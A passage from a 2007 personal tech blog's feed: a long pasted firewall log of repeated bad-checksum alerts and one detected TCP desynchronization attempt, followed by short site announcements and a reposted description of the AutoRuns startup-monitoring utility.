IP packet checksum 0 <br />15/11/2007 21:17:11 Incorrect IP packet checksum 0 <br />15/11/2007 21:17:10 Incorrect IP packet checksum 0 <br />15/11/2007 20:22:41 Incorrect IP packet checksum 0 <br />15/11/2007 20:22:40 Incorrect IP packet checksum 0 <br />15/11/2007 20:22:40 Incorrect IP packet checksum 0 <br />15/11/2007 20:22:40 Incorrect IP packet checksum 0 <br />15/11/2007 20:22:40 Incorrect IP packet checksum 0 <br />15/11/2007 20:22:39 Incorrect IP packet checksum 0 <br />15/11/2007 20:22:08 Incorrect IP packet checksum 0 <br />15/11/2007 20:12:12 Incorrect IP packet checksum 0 <br />15/11/2007 20:12:07 Incorrect IP packet checksum 0 <br />15/11/2007 20:12:07 Incorrect IP packet checksum 0 <br />15/11/2007 20:12:06 Incorrect IP packet checksum 0 <br />15/11/2007 20:12:06 Incorrect IP packet checksum 0 <br />15/11/2007 20:12:06 Incorrect IP packet checksum 0 <br />15/11/2007 20:12:06 Incorrect IP packet checksum 0 <br />15/11/2007 20:12:06 Incorrect IP packet checksum 0 <br />15/11/2007 20:12:06 Incorrect IP packet checksum 0 <br />15/11/2007 20:12:06 Incorrect IP packet checksum 0 <br />15/11/2007 20:12:06 Incorrect IP packet checksum 0 <br />15/11/2007 20:11:37 Incorrect IP packet checksum 0 <br />15/11/2007 19:42:59 Incorrect IP packet checksum 0 <br />15/11/2007 19:42:57 Incorrect IP packet checksum 0 <br />15/11/2007 19:42:57 Incorrect IP packet checksum 0 <br />15/11/2007 19:42:57 Incorrect IP packet checksum 0 <br />15/11/2007 19:42:57 Incorrect IP packet checksum 0 <br />15/11/2007 19:42:56 Incorrect IP packet checksum 0 <br />15/11/2007 19:42:29 Incorrect IP packet checksum 0 <br />15/11/2007 18:47:43 Incorrect IP packet checksum 0 <br />15/11/2007 18:47:41 Incorrect IP packet checksum 0 <br />15/11/2007 18:47:41 Incorrect IP packet checksum 0 <br />15/11/2007 18:47:40 Incorrect IP packet checksum 0 <br />15/11/2007 18:47:40 Incorrect IP packet checksum 0 <br />15/11/2007 18:47:40 Incorrect IP packet checksum 0 <br />15/11/2007 18:32:39 Incorrect IP packet checksum 0 <br />15/11/2007 18:10:41 Incorrect IP packet checksum 0 <br />15/11/2007 18:10:38 Incorrect IP packet checksum 0 <br />15/11/2007 18:10:38 Incorrect IP packet checksum 0 <br />15/11/2007 18:10:37 Incorrect IP packet checksum 0 <br />15/11/2007 18:10:37 Incorrect IP packet checksum 0 <br />15/11/2007 18:10:37 Incorrect IP packet checksum 0 <br />15/11/2007 18:10:37 Incorrect IP packet checksum 0 <br />15/11/2007 18:10:36 Incorrect IP packet checksum 0 <br />15/11/2007 18:10:36 Incorrect IP packet checksum 0 <br />15/11/2007 18:10:36 Incorrect IP packet checksum 0 <br />15/11/2007 18:10:36 Incorrect IP packet checksum 0 <br />15/11/2007 18:10:36 Incorrect IP packet checksum 0 <br />15/11/2007 18:10:36 Incorrect IP packet checksum 0 <br />15/11/2007 18:10:36 Incorrect IP packet checksum 0 <br />15/11/2007 16:17:03 Incorrect IP packet checksum 0 <br />15/11/2007 16:10:33 Incorrect IP packet checksum 0 <br />15/11/2007 16:10:31 Incorrect IP packet checksum 0 <br />15/11/2007 16:10:31 Incorrect IP packet checksum 0 <br />15/11/2007 16:10:30 Incorrect IP packet checksum 0 <br />15/11/2007 16:10:30 Incorrect IP packet checksum 0 <br />15/11/2007 16:10:30 Incorrect IP packet checksum 0 <br />15/11/2007 15:46:04 Incorrect IP packet checksum 0 <br />15/11/2007 15:45:57 Incorrect IP packet checksum 0 <br />15/11/2007 15:45:57 Incorrect IP packet checksum 0 <br />15/11/2007 15:45:57 Incorrect IP packet checksum 0 <br />15/11/2007 15:45:57 Incorrect IP packet checksum 0 <br />15/11/2007 15:45:56 Incorrect IP packet checksum 0 <br />15/11/2007 15:45:56 Incorrect IP packet checksum 0 <br />15/11/2007 15:45:55 Incorrect IP packet checksum 0 <br />15/11/2007 15:45:55 Incorrect IP packet checksum 0 <br />15/11/2007 15:45:55 Incorrect IP packet checksum 0 <br />15/11/2007 15:20:12 Incorrect IP packet checksum 0 <br />15/11/2007 15:17:28 Incorrect IP packet checksum 0 <br />15/11/2007 15:17:20 Incorrect IP packet checksum 0 <br />15/11/2007 15:17:20 Incorrect IP packet checksum 0 <br />15/11/2007 15:17:20 Incorrect IP packet checksum 0 <br />15/11/2007 15:17:20 Incorrect IP packet checksum 0 <br />15/11/2007 15:17:20 Incorrect IP packet checksum 0 <br />15/11/2007 15:17:20 Incorrect IP packet checksum 0 <br />15/11/2007 15:17:19 Incorrect IP packet checksum 0 <br />15/11/2007 15:17:19 Incorrect IP packet checksum 0 <br />15/11/2007 15:17:19 Incorrect IP packet checksum 0 <br />15/11/2007 15:17:19 Incorrect IP packet checksum 0 <br />15/11/2007 15:17:19 Incorrect IP packet checksum 0 <br />15/11/2007 15:13:43 Incorrect IP packet checksum 0 <br />15/11/2007 15:09:29 Incorrect IP packet checksum 0 <br />15/11/2007 15:09:27 Incorrect IP packet checksum 0 <br />15/11/2007 15:09:27 Incorrect IP packet checksum 0 <br />15/11/2007 15:09:27 Incorrect IP packet checksum 0 <br />15/11/2007 15:09:27 Incorrect IP packet checksum 0 <br />15/11/2007 15:09:27 Incorrect IP packet checksum 0 <br />15/11/2007 15:09:27 Incorrect IP packet checksum 0 <br />15/11/2007 15:09:07 Incorrect IP packet checksum 0 <br />15/11/2007 14:09:58 Incorrect IP packet checksum 0 <br />15/11/2007 14:09:57 Incorrect IP packet checksum 0 <br />15/11/2007 14:09:57 Incorrect IP packet checksum 0 <br />15/11/2007 14:09:56 Incorrect IP packet checksum 0 <br />15/11/2007 14:09:56 Incorrect IP packet checksum 0 <br />15/11/2007 14:09:56 Incorrect IP packet checksum 0 <br />15/11/2007 13:15:24 Incorrect IP packet checksum 0 <br />15/11/2007 13:05:09 Incorrect IP packet checksum 0 <br />15/11/2007 13:05:07 Incorrect IP packet checksum 0 <br />15/11/2007 13:05:07 Incorrect IP packet checksum 0 <br />15/11/2007 13:05:07 Incorrect IP packet checksum 0 <br />15/11/2007 13:05:07 Incorrect IP packet checksum 0 <br />15/11/2007 13:05:07 Incorrect IP packet checksum 0 <br />15/11/2007 13:01:51 Incorrect IP packet checksum 0 <br />15/11/2007 12:58:30 Incorrect IP packet checksum 0 <br />15/11/2007 12:58:28 Incorrect IP packet checksum 0 <br />15/11/2007 12:58:28 Incorrect IP packet checksum 0 <br />15/11/2007 12:58:27 Incorrect IP packet checksum 0 <br />15/11/2007 12:58:27 Incorrect IP packet checksum 0 <br />15/11/2007 12:58:27 Incorrect IP packet checksum 0 <br />15/11/2007 12:57:59 Incorrect IP packet checksum 0 <br />15/11/2007 12:50:48 Incorrect IP packet checksum 0 <br />15/11/2007 12:50:46 Incorrect IP packet checksum 0 <br />15/11/2007 12:50:46 Incorrect IP packet checksum 0 <br />15/11/2007 12:50:46 Incorrect IP packet checksum 0 <br />15/11/2007 12:50:46 Incorrect IP packet checksum 0 <br />15/11/2007 12:50:46 Incorrect IP packet checksum 0 <br />14/11/2007 22:29:07 Incorrect IP packet checksum 0 <br />14/11/2007 22:29:05 Incorrect IP packet checksum 0 <br />14/11/2007 22:29:05 Incorrect IP packet checksum 0 <br />14/11/2007 22:29:05 Incorrect IP packet checksum 0 <br />14/11/2007 22:22:33 Incorrect IP packet checksum 0 <br />14/11/2007 22:22:32 Incorrect IP packet checksum 0 <br />14/11/2007 22:22:32 Incorrect IP packet checksum 0 <br />14/11/2007 22:22:32 Incorrect IP packet checksum 0 <br />14/11/2007 19:33:36 Incorrect IP packet checksum 0 <br />14/11/2007 19:13:34 Incorrect IP packet checksum 0 <br />14/11/2007 19:13:30 Incorrect IP packet checksum 0 <br />14/11/2007 19:13:30 Incorrect IP packet checksum 0 <br />14/11/2007 19:13:30 Incorrect IP packet checksum 0 <br />14/11/2007 19:05:24 Incorrect IP packet checksum 0 <br />14/11/2007 19:05:14 Incorrect IP packet checksum 0 <br />14/11/2007 19:05:14 Incorrect IP packet checksum 0 <br />14/11/2007 19:05:13 Incorrect IP packet checksum 0 <br />14/11/2007 19:05:13 Incorrect IP packet checksum 0 <br />14/11/2007 16:39:35 Incorrect IP packet checksum 0 <br />14/11/2007 16:39:26 Incorrect IP packet checksum 0 <br />14/11/2007 16:39:25 Incorrect IP packet checksum 0 <br />14/11/2007 16:39:25 Incorrect IP packet checksum 0 <br />14/11/2007 16:39:25 Incorrect IP packet checksum 0 <br />14/11/2007 16:39:24 Incorrect IP packet checksum 0 <br />14/11/2007 16:39:24 Incorrect IP packet checksum 0 <br />14/11/2007 16:20:31 Incorrect IP packet checksum 0 <br />14/11/2007 16:20:30 Incorrect IP packet checksum 0 <br />14/11/2007 16:20:30 Incorrect IP packet checksum 0 <br />14/11/2007 16:20:29 Incorrect IP packet checksum 0 <br />14/11/2007 16:17:42 Incorrect IP packet checksum 0 <br />14/11/2007 16:17:40 Incorrect IP packet checksum 0 <br />14/11/2007 16:17:39 Incorrect IP packet checksum 0 <br />14/11/2007 16:17:39 Incorrect IP packet checksum 0 <br />14/11/2007 16:17:38 Incorrect IP packet checksum 0 <br />14/11/2007 16:17:38 Incorrect IP packet checksum 0 <br />13/11/2007 22:00:36 Incorrect IP packet checksum 0 <br />13/11/2007 21:46:47 Incorrect IP packet checksum 0 <br />13/11/2007 21:46:45 Incorrect IP packet checksum 0 <br />13/11/2007 21:46:45 Incorrect IP packet checksum 0 <br />13/11/2007 21:46:44 Incorrect IP packet checksum 0 <br />13/11/2007 21:46:44 Incorrect IP packet checksum 0 <br />13/11/2007 21:46:44 Incorrect IP packet checksum 0 <br />13/11/2007 17:38:50 Incorrect IP packet checksum 0 <br />13/11/2007 17:37:48 Incorrect IP packet checksum 0 <br />13/11/2007 17:37:47 Incorrect IP packet checksum 0 <br />13/11/2007 17:37:47 Incorrect IP packet checksum 0 <br />13/11/2007 17:37:47 Incorrect IP packet checksum 0 <br />13/11/2007 17:37:46 Incorrect IP packet checksum 0 <br />13/11/2007 17:37:46 Incorrect IP packet checksum 0 <br />13/11/2007 17:37:20 Incorrect IP packet checksum 0 <br />13/11/2007 17:28:40 Incorrect IP packet checksum 0 <br />13/11/2007 17:28:38 Incorrect IP packet checksum 0 <br />13/11/2007 17:28:38 Incorrect IP packet checksum 0 <br />13/11/2007 17:28:37 Incorrect IP packet checksum 0 <br />13/11/2007 17:28:37 Incorrect IP packet checksum 0 <br />13/11/2007 17:28:37 Incorrect IP packet checksum 0 <br />13/11/2007 17:28:37 Incorrect IP packet checksum 0 <br />13/11/2007 17:28:37 Incorrect IP packet checksum 0 <br />13/11/2007 16:54:03 Incorrect IP packet checksum 0 <br />13/11/2007 16:23:24 Incorrect IP packet checksum 0 <br />13/11/2007 16:23:20 Incorrect IP packet checksum 0 <br />13/11/2007 16:23:20 Incorrect IP packet checksum 0 <br />13/11/2007 16:23:20 Incorrect IP packet checksum 0 <br />13/11/2007 16:23:20 Incorrect IP packet checksum 0 <br />13/11/2007 16:23:20 Incorrect IP packet checksum 0 <br />13/11/2007 16:22:52 Incorrect IP packet checksum 0 <br />13/11/2007 16:11:11 Incorrect IP packet checksum 0 <br />13/11/2007 16:11:09 Incorrect IP packet checksum 0 <br />13/11/2007 16:11:09 Incorrect IP packet checksum 0 <br />13/11/2007 16:11:09 Incorrect IP packet checksum 0 <br />13/11/2007 16:11:09 Incorrect IP packet checksum 0 <br />13/11/2007 16:11:09 Incorrect IP packet checksum 0 <br />13/11/2007 16:11:09 Incorrect IP packet checksum 0 <br />13/11/2007 16:11:08 Incorrect IP packet checksum 0 <br />13/11/2007 16:11:08 Incorrect IP packet checksum 0 <br />13/11/2007 16:11:07 Incorrect IP packet checksum 0 <br />13/11/2007 16:10:01 Incorrect IP packet checksum 0 <br />13/11/2007 16:03:59 Incorrect IP packet checksum 0 <br />13/11/2007 16:03:54 Incorrect IP packet checksum 0 <br />13/11/2007 16:03:54 Incorrect IP packet checksum 0 <br />13/11/2007 16:03:54 Incorrect IP packet checksum 0 <br />13/11/2007 16:03:54 Incorrect IP packet checksum 0 <br />13/11/2007 16:03:54 Incorrect IP packet checksum 0 <br />13/11/2007 16:00:10 Incorrect IP packet checksum 0 <br />13/11/2007 15:51:25 Incorrect IP packet checksum 0 <br />13/11/2007 15:51:19 Incorrect IP packet checksum 0 <br />13/11/2007 15:51:19 Incorrect IP packet checksum 0 <br />13/11/2007 15:51:19 Incorrect IP packet checksum 0 <br />13/11/2007 15:51:19 Incorrect IP packet checksum 0 <br />13/11/2007 15:51:18 Incorrect IP packet checksum 0 <br />13/11/2007 15:43:46 Incorrect IP packet checksum 0 <br />13/11/2007 15:42:50 Incorrect IP packet checksum 0 <br />13/11/2007 15:42:46 Incorrect IP packet checksum 0 <br />13/11/2007 15:42:46 Incorrect IP packet checksum 0 <br />13/11/2007 15:42:46 Incorrect IP packet checksum 0 <br />13/11/2007 15:42:45 Incorrect IP packet checksum 0 <br />13/11/2007 15:42:45 Incorrect IP packet checksum 0 <br />12/11/2007 20:17:30 Incorrect IP packet checksum 0 <br />12/11/2007 20:09:25 Incorrect IP packet checksum 0 <br />12/11/2007 20:09:23 Incorrect IP packet checksum 0 <br />12/11/2007 20:09:23 Incorrect IP packet checksum 0 <br />12/11/2007 20:09:23 Incorrect IP packet checksum 0 <br />12/11/2007 20:09:23 Incorrect IP packet checksum 0 <br />12/11/2007 20:09:22 Incorrect IP packet checksum 0 <br />12/11/2007 19:35:41 Incorrect IP packet checksum 0 <br />12/11/2007 19:33:36 Incorrect IP packet checksum 0 <br />12/11/2007 19:33:36 Incorrect IP packet checksum 0 <br />12/11/2007 19:33:36 Incorrect IP packet checksum 0 <br />12/11/2007 19:33:35 Incorrect IP packet checksum 0 <br />12/11/2007 19:33:35 Incorrect IP packet checksum 0 <br />12/11/2007 19:33:35 Incorrect IP packet checksum 0 <br />12/11/2007 19:33:09 Incorrect IP packet checksum 0 <br />12/11/2007 19:33:03 Incorrect IP packet checksum 0 <br />12/11/2007 19:33:03 Incorrect IP packet checksum 0 <br />12/11/2007 19:33:02 Incorrect IP packet checksum 0 <br />12/11/2007 19:33:02 Incorrect IP packet checksum 0 <br />12/11/2007 19:33:02 Incorrect IP packet checksum 0 <br />12/11/2007 19:32:21 Incorrect IP packet checksum 0 <br />12/11/2007 19:31:15 Incorrect IP packet checksum 0 <br />12/11/2007 19:31:14 Incorrect IP packet checksum 0 <br />12/11/2007 19:31:14 Incorrect IP packet checksum 0 <br />12/11/2007 19:31:14 Incorrect IP packet checksum 0 <br />12/11/2007 19:31:14 Incorrect IP packet checksum 0 <br />12/11/2007 19:31:14 Incorrect IP packet checksum 0 <br />12/11/2007 19:30:46 Incorrect IP packet checksum 0 <br />12/11/2007 19:30:40 Incorrect IP packet checksum 0 <br />12/11/2007 19:30:35 Incorrect IP packet checksum 0 <br />12/11/2007 19:30:35 Incorrect IP packet checksum 0 <br />12/11/2007 19:30:34 Incorrect IP packet checksum 0 <br />12/11/2007 19:30:34 Incorrect IP packet checksum 0 <br />12/11/2007 19:30:34 Incorrect IP packet checksum 0 <br />12/11/2007 19:29:46 Incorrect IP packet checksum 0 <br />12/11/2007 19:29:08 Incorrect IP packet checksum 0 <br />12/11/2007 19:29:07 Incorrect IP packet checksum 0 <br />12/11/2007 19:29:07 Incorrect IP packet checksum 0 <br />12/11/2007 19:29:07 Incorrect IP packet checksum 0 <br />12/11/2007 19:29:07 Incorrect IP packet checksum 0 <br />12/11/2007 19:29:06 Incorrect IP packet checksum 0 <br />12/11/2007 19:29:06 Incorrect IP packet checksum 0 <br />12/11/2007 19:28:30 Incorrect IP packet checksum 0 <br />12/11/2007 19:28:14 Incorrect IP packet checksum 0 <br />12/11/2007 19:28:05 Incorrect IP packet checksum 0 <br />12/11/2007 19:28:05 Incorrect IP packet checksum 0 <br />12/11/2007 19:28:04 Incorrect IP packet checksum 0 <br />12/11/2007 19:28:04 Incorrect IP packet checksum 0 <br />12/11/2007 19:28:03 Incorrect IP packet checksum 0 <br />12/11/2007 19:28:00 Incorrect IP packet checksum 0 <br />12/11/2007 19:25:37 Incorrect IP packet checksum 0 <br />12/11/2007 19:15:14 Incorrect IP packet checksum 0 <br />12/11/2007 19:15:04 Incorrect IP packet checksum 0 <br />12/11/2007 19:15:04 Incorrect IP packet checksum 0 <br />12/11/2007 19:15:04 Incorrect IP packet checksum 0 <br />12/11/2007 19:15:04 Incorrect IP packet checksum 0 <br />12/11/2007 19:15:03 Incorrect IP packet checksum 0 <br />12/11/2007 19:14:35 Incorrect IP packet checksum 0 <br />12/11/2007 19:13:18 Incorrect IP packet checksum 0 <br />12/11/2007 19:13:15 Incorrect IP packet checksum 0 <br />12/11/2007 19:13:15 Incorrect IP packet checksum 0 <br />12/11/2007 19:13:14 Incorrect IP packet checksum 0 <br />12/11/2007 19:13:14 Incorrect IP packet checksum 0 <br />12/11/2007 19:13:14 Incorrect IP packet checksum 0 <br />12/11/2007 19:12:48 Incorrect IP packet checksum 0 <br />12/11/2007 19:12:43 Incorrect IP packet checksum 0 <br />12/11/2007 19:12:39 Incorrect IP packet checksum 0 <br />12/11/2007 19:12:39 Incorrect IP packet checksum 0 <br />12/11/2007 19:12:39 Incorrect IP packet checksum 0 <br />12/11/2007 19:12:39 Incorrect IP packet checksum 0 <br />12/11/2007 19:12:39 Incorrect IP packet checksum 0 <br />12/11/2007 19:12:13 Incorrect IP packet checksum 0 <br />12/11/2007 19:12:05 Incorrect IP packet checksum 0 <br />12/11/2007 19:12:01 Incorrect IP packet checksum 0 <br />12/11/2007 19:12:01 Incorrect IP packet checksum 0 <br />12/11/2007 19:12:01 Incorrect IP packet checksum 0 <br />12/11/2007 19:12:01 Incorrect IP packet checksum 0 <br />12/11/2007 19:12:01 Incorrect IP packet checksum 0 <br />12/11/2007 19:11:32 Incorrect IP packet checksum 0 <br />12/11/2007 19:11:10 Incorrect IP packet checksum 0 <br />12/11/2007 19:11:07 Incorrect IP packet checksum 0 <br />12/11/2007 19:11:07 Incorrect IP packet checksum 0 <br />12/11/2007 19:11:06 Incorrect IP packet checksum 0 <br />12/11/2007 19:11:06 Incorrect IP packet checksum 0 <br />12/11/2007 19:11:06 Incorrect IP packet checksum 0 <br />12/11/2007 19:10:39 Incorrect IP packet checksum 0 <br />12/11/2007 19:08:39 Incorrect IP packet checksum 0 <br />12/11/2007 19:08:38 Incorrect IP packet checksum 0 <br />12/11/2007 19:08:38 Incorrect IP packet checksum 0 <br />12/11/2007 19:08:37 Incorrect IP packet checksum 0 <br />12/11/2007 19:08:37 Incorrect IP packet checksum 0 <br />12/11/2007 19:08:36 Incorrect IP packet checksum 0 <br />12/11/2007 19:08:36 Incorrect IP packet checksum 0 <br />12/11/2007 19:08:36 Incorrect IP packet checksum 0 <br />12/11/2007 19:08:10 Incorrect IP packet checksum 0 <br />12/11/2007 19:04:22 Incorrect IP packet checksum 0 <br />12/11/2007 19:04:21 Incorrect IP packet checksum 0 <br />12/11/2007 19:04:21 Incorrect IP packet checksum 0 <br />12/11/2007 19:04:20 Incorrect IP packet checksum 0 <br />12/11/2007 19:04:20 Incorrect IP packet checksum 0 <br />12/11/2007 19:04:20 Incorrect IP packet checksum 0 <br />12/11/2007 18:50:13 Incorrect IP packet checksum 0 <br />12/11/2007 18:49:59 Incorrect IP packet checksum 0 <br />12/11/2007 18:49:51 Incorrect IP packet checksum 0 <br />12/11/2007 18:49:51 Incorrect IP packet checksum 0 <br />12/11/2007 18:49:50 Incorrect IP packet checksum 0 <br />12/11/2007 18:49:50 Incorrect IP packet checksum 0 <br />12/11/2007 18:49:50 Incorrect IP packet checksum 0 <br />12/11/2007 18:49:23 Incorrect IP packet checksum 0 <br />12/11/2007 18:34:18 Incorrect IP packet checksum 0 <br />12/11/2007 18:34:16 Incorrect IP packet checksum 0 <br />12/11/2007 18:34:16 Incorrect IP packet checksum 0 <br />12/11/2007 18:34:16 Incorrect IP packet checksum 0 <br />12/11/2007 18:34:16 Incorrect IP packet checksum 0 <br />12/11/2007 18:34:15 Incorrect IP packet checksum 0 <br />12/11/2007 18:33:50 Incorrect IP packet checksum 0 <br />12/11/2007 18:31:03 Incorrect IP packet checksum 0 <br />12/11/2007 18:31:00 Incorrect IP packet checksum 0 <br />12/11/2007 18:31:00 Incorrect IP packet checksum 0 <br />12/11/2007 18:31:00 Incorrect IP packet checksum 0 <br />12/11/2007 18:31:00 Incorrect IP packet checksum 0 <br />12/11/2007 18:31:00 Incorrect IP packet checksum 0 <br />12/11/2007 18:10:00 Incorrect IP packet checksum 0 <br />12/11/2007 18:02:13 Incorrect IP packet checksum 0 <br />12/11/2007 18:02:04 Incorrect IP packet checksum 0 <br />12/11/2007 18:02:04 Incorrect IP packet checksum 0 <br />12/11/2007 18:02:04 Incorrect IP packet checksum 0 <br />12/11/2007 18:02:04 Incorrect IP packet checksum 0 <br />12/11/2007 18:02:04 Incorrect IP packet checksum 0 <br />12/11/2007 17:50:13 Incorrect IP packet checksum 0 <br />12/11/2007 17:39:29 Incorrect IP packet checksum 0 <br />12/11/2007 17:39:27 Incorrect IP packet checksum 0 <br />12/11/2007 17:39:27 Incorrect IP packet checksum 0 <br />12/11/2007 17:39:27 Incorrect IP packet checksum 0 <br />12/11/2007 17:39:26 Incorrect IP packet checksum 0 <br />12/11/2007 17:39:26 Incorrect IP packet checksum 0 <br />11/11/2007 23:07:42 Incorrect IP packet checksum 0 <br />11/11/2007 22:52:43 Incorrect IP packet checksum 0 <br />11/11/2007 22:52:35 Incorrect IP packet checksum 0 <br />11/11/2007 22:52:35 Incorrect IP packet checksum 0 <br />11/11/2007 22:52:35 Incorrect IP packet checksum 0 <br />11/11/2007 22:52:35 Incorrect IP packet checksum 0 <br />11/11/2007 22:52:35 Incorrect IP packet checksum 0 <br />11/11/2007 21:31:34 Incorrect IP packet checksum 0 <br />11/11/2007 21:31:31 Incorrect IP packet checksum 0 <br />11/11/2007 21:31:31 Incorrect IP packet checksum 0 <br />11/11/2007 21:31:31 Incorrect IP packet checksum 0 <br />11/11/2007 21:31:31 Incorrect IP packet checksum 0 <br />11/11/2007 21:31:31 Incorrect IP packet checksum 0 <br />11/11/2007 21:31:31 Incorrect IP packet checksum 0 <br />11/11/2007 21:31:30 Incorrect IP packet checksum 0 <br />11/11/2007 21:31:30 Incorrect IP packet checksum 0 <br />11/11/2007 21:31:30 Incorrect IP packet checksum 0 <br />11/11/2007 21:31:30 Incorrect IP packet checksum 0 <br />11/11/2007 21:31:30 Incorrect IP packet checksum 0 <br />11/11/2007 21:31:30 Incorrect IP packet checksum 0 <br />11/11/2007 21:31:30 Incorrect IP packet checksum 0 <br />11/11/2007 21:12:44 Incorrect IP packet checksum 0 <br />11/11/2007 21:12:37 Incorrect IP packet checksum 0 <br />11/11/2007 21:12:37 Incorrect IP packet checksum 0 <br />11/11/2007 21:12:37 Incorrect IP packet checksum 0 <br />11/11/2007 21:12:37 Incorrect IP packet checksum 0 <br />11/11/2007 21:12:36 Incorrect IP packet checksum 0 <br />11/11/2007 20:56:54 Incorrect IP packet checksum 0 <br />11/11/2007 20:56:23 Incorrect IP packet checksum 0 <br />11/11/2007 20:56:21 Incorrect IP packet checksum 0 <br />11/11/2007 20:56:21 Incorrect IP packet checksum 0 <br />11/11/2007 20:56:20 Incorrect IP packet checksum 0 <br />11/11/2007 20:56:20 Incorrect IP packet checksum 0 <br />11/11/2007 20:56:20 Incorrect IP packet checksum 0 <br />11/11/2007 20:56:20 Incorrect IP packet checksum 0 <br />11/11/2007 20:56:19 Incorrect IP packet checksum 0 <br />11/11/2007 20:52:36 Incorrect IP packet checksum 0 <br />11/11/2007 20:47:18 Incorrect IP packet checksum 0 <br />11/11/2007 20:47:14 Incorrect IP packet checksum 0 <br />11/11/2007 20:47:14 Incorrect IP packet checksum 0 <br />11/11/2007 20:47:14 Incorrect IP packet checksum 0 <br />11/11/2007 20:47:14 Incorrect IP packet checksum 0 <br />11/11/2007 20:47:13 Incorrect IP packet checksum 0 <br />11/11/2007 17:57:04 Incorrect IP packet checksum 0 <br />11/11/2007 17:57:03 Incorrect IP packet checksum 0 <br />11/11/2007 17:57:03 Incorrect IP packet checksum 0 <br />11/11/2007 17:57:03 Incorrect IP packet checksum 0 <br />11/11/2007 17:57:03 Incorrect IP packet checksum 0 <br />11/11/2007 17:57:03 Incorrect IP packet checksum 0 <br />11/11/2007 17:16:38 Incorrect IP packet checksum 0 <br />11/11/2007 17:16:30 Incorrect IP packet checksum 0 <br />11/11/2007 17:16:30 Incorrect IP packet checksum 0 <br />11/11/2007 17:16:30 Incorrect IP packet checksum 0 <br />11/11/2007 17:16:30 Incorrect IP packet checksum 0 <br />11/11/2007 17:16:29 Incorrect IP packet checksum 0 <br />11/11/2007 17:16:29 Incorrect IP packet checksum 0 <br />11/11/2007 17:16:29 Incorrect IP packet checksum 0 <br />10/11/2007 17:28:22 Detected Reverse TCP Desynchronization attack 218.254.188.46:4770 192.168.2.5:50390 TCP<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1922987820881544907-8818156757844965812?l=blazecompany.blogspot.com' alt='' /></div>Blaze Company - Edwinhttp://www.blogger.com/profile/14262650963282233192noreply@blogger.com0tag:blogger.com,1999:blog-1922987820881544907.post-17740463361580495542007-11-20T22:26:00.001-08:002007-11-20T22:26:26.260-08:00People Who Has A Mac or Linux Please Contact Us<span style="color:red;"><b>People Who Has A Mac or Linux Please Contact Us</b></span><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1922987820881544907-1774046336158049554?l=blazecompany.blogspot.com' alt='' /></div>Blaze Company - Edwinhttp://www.blogger.com/profile/14262650963282233192noreply@blogger.com0tag:blogger.com,1999:blog-1922987820881544907.post-81392741262883868062007-11-08T04:42:00.000-08:002007-11-08T04:45:25.193-08:00Blaze Company No Longer Support Nakuz ForumAfter a few months of discussion , we decided to leave Nakuz Fourm<br /><br />Vote Results<br /><br />12 Agree to Leave / 10 Disagree to Leave<br /><br />Edwin will resign the moderator of Nakuz Computer Forums and we are going to build a forum later on.<br /><br />People who are interested are welcome to leave comments for more details<br /><br />Thanks,<br />Blaze Company - Admin Team<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1922987820881544907-8139274126288386806?l=blazecompany.blogspot.com' alt='' /></div>Blaze Company - Edwinhttp://www.blogger.com/profile/14262650963282233192noreply@blogger.com0tag:blogger.com,1999:blog-1922987820881544907.post-56501015217062048212007-10-31T02:57:00.000-07:002007-10-31T02:59:43.724-07:00Notice : Background Music AddedWasted half-an-hour to upload the background music..<br />Still working on it =)<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://i240.photobucket.com/albums/ff173/proedwin/upload.png"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 400px;" src="http://i240.photobucket.com/albums/ff173/proedwin/upload.png" alt="" border="0" /></a><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1922987820881544907-5650101521706204821?l=blazecompany.blogspot.com' alt='' /></div>Blaze Company - Edwinhttp://www.blogger.com/profile/14262650963282233192noreply@blogger.com0tag:blogger.com,1999:blog-1922987820881544907.post-21852897365819313392007-10-30T02:57:00.000-07:002007-10-30T02:59:53.485-07:00AutoRuns for Windows v8.73<h2>Introduction</h2><p> This utility, which has the most comprehensive knowledge of auto-starting locations of any startup monitor, shows you what programs are configured to run during system bootup or login, and shows you the entries in the order Windows processes them. These programs include ones in your startup folder, Run, RunOnce, and other Registry keys. You can configure <i>Autoruns</i> to show other locations, including Explorer shell extensions, toolbars, browser helper objects, Winlogon notifications, auto-start services, and much more. <i>Autoruns</i> goes way beyond the MSConfig utility bundled with Windows Me and XP. </p><p><i>Autoruns</i>' <b>Hide Signed Microsoft Entries</b> option helps you to zoom in on third-party auto-starting images that have been added to your system and it has support for looking at the auto-starting images configured for other accounts configured on a system. Also included in the download package is a command-line equivalent that can output in CSV format, Autorunsc. </p><p> You'll probably be surprised at how many executables are launched automatically! </p><p><i>Autoruns</i> works on all versions of Windows including 64-bit versions.</p><br /><p><br /></p><h2>Screenshot</h2><img src="http://img.microsoft.com/library/media/1033/technet/images/sysinternals/images/screenshots/Autoruns.gif" alt="Autoruns Screenshot" border="0" height="367" width="540" /><div style="margin-top: 3px; margin-bottom: 10px;"><br /><p> See the November 2004 issue of Windows IT Pro Magazine for Mark's <a href="http://www.win2000mag.com/Windows/Article/ArticleID/44089/44089.html">article</a> that covers advanced usage of <i>Autoruns</i> . If you have questions or problems visit the <a href="http://forum.sysinternals.com/">Sysinternals Autoruns Forum</a>. </p><p> Simply run <i>Autoruns</i> and it shows you the currently configured auto-start applications as well as the full list of Registry and file system locations available for auto-start configuration. Autostart locations displayed by Autoruns include logon entries, Explorer add-ons, Internet Explorer add-ons including Browser Helper Objects (BHOs), Appinit DLLs, image hijacks, boot execute images, Winlogon notification DLLs, Windows Services and Winsock Layered Service Providers. Switch tabs to view autostarts from different categories. </p><p> To view the properties of an executable configured to run automatically, select it and use the <b>Properties</b> menu item or toolbar button. If <a href="http://www.microsoft.com/technet/sysinternals/utilities/processexplorer.mspx">Process Explorer</a> is running and there is an active process executing the selected executable then the <b>Process Explorer </b>menu item in the <b>Entry </b>menu will open the process properties dialog box for the process executing the selected image.</p><p> Navigate to the Registry or file system location displayed or the configuration of an auto-start item by selecting the item and using the <b>Jump</b> menu item or toolbar button. </p><p> To disable an auto-start entry uncheck its check box. To delete an auto-start configuration entry use the <b>Delete</b> menu item or toolbar button. </p><p> Select entries in the <b>User</b> menu to view auto-starting images for different user accounts. </p><p> More information on display options 